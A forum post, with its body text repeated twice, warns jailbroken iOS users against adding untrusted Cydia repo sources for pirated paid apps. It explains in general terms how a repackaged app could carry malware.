ardchoille
Well-Known Member
- Joined
- Mar 28, 2012
- Messages
- 4,361
- Reaction score
- 2,070
I'm writing this because I'm beginning to see a lot of sources for free versions of paid apps/tweaks.. and to let you know why you should stay away from them.
I have used Linux distros as my sole operating systems for over 10 years. Linux distros use what are known as package managers to manage apps. One of the more popular package managers is the debian package manager - which is used by Cydia.
Package managers rely on what are known as "sources". Sources tell the package manager, among other things, where to find packages. The packages are maintained in "repos" on a server somewhere. The package manager uses the sources to contact the repos in order to verify and install apps.
Now, it's very easy to set up a repo. And it's very easy to add sources for any repo to a package manager. But, what we have to ask ourselves is, "what is in the packages in those repos?"
Scenario #1 (trusted sources):
1. Create an app
2. Add it to a repo
3. Let the public know about the sources for said repo
4. The public adds the sources and installs apps
Scenario #2 (untrusted sources):
1. Download an app
2. Re-write the app to include whatever you want in it
3. Add it to a repo
3. Let the public know about the sources for said repo
4. The public adds the sources and installs apps
Scenario #1 is what we see happening in Cydia, we already have some sources for officially accepted apps. This is an example of trusted sources.
Scenario #2 is what would happen if I were to, say, re-write an app to include trojans, viruses, malware, rootkits or download these items at a later time. The sources and apps appear to be legitimate but my apps will download other apps, outside of the repos, and/or install anything I want on your device. This is an example of untrusted sources.
Scenario #1 is what we want. Scenario #2 is what you want to steer clear of because you don't really know what you're installing.
How can we differentiate between trusted and untrusted sources? We can't.. not without research. The problem is that the average user won't know what research is involved or what to look for.
Moral of the story: Don't add sources to Cydia until you know what you're getting yourself into, you could be asking for more than you bargained for. If you want a paid app, pay for it. You'll be rewarding the developer, keeping your device safe and you can expect upgrades and fixes.
What's popular is not always right. What's right is not always popular.
I have used Linux distros as my sole operating systems for over 10 years. Linux distros use what are known as package managers to manage apps. One of the more popular package managers is the debian package manager - which is used by Cydia.
Package managers rely on what are known as "sources". Sources tell the package manager, among other things, where to find packages. The packages are maintained in "repos" on a server somewhere. The package manager uses the sources to contact the repos in order to verify and install apps.
Now, it's very easy to set up a repo. And it's very easy to add sources for any repo to a package manager. But, what we have to ask ourselves is, "what is in the packages in those repos?"
Scenario #1 (trusted sources):
1. Create an app
2. Add it to a repo
3. Let the public know about the sources for said repo
4. The public adds the sources and installs apps
Scenario #2 (untrusted sources):
1. Download an app
2. Re-write the app to include whatever you want in it
3. Add it to a repo
3. Let the public know about the sources for said repo
4. The public adds the sources and installs apps
Scenario #1 is what we see happening in Cydia, we already have some sources for officially accepted apps. This is an example of trusted sources.
Scenario #2 is what would happen if I were to, say, re-write an app to include trojans, viruses, malware, rootkits or download these items at a later time. The sources and apps appear to be legitimate but my apps will download other apps, outside of the repos, and/or install anything I want on your device. This is an example of untrusted sources.
Scenario #1 is what we want. Scenario #2 is what you want to steer clear of because you don't really know what you're installing.
How can we differentiate between trusted and untrusted sources? We can't.. not without research. The problem is that the average user won't know what research is involved or what to look for.
Moral of the story: Don't add sources to Cydia until you know what you're getting yourself into, you could be asking for more than you bargained for. If you want a paid app, pay for it. You'll be rewarding the developer, keeping your device safe and you can expect upgrades and fixes.
What's popular is not always right. What's right is not always popular.
Last edited:
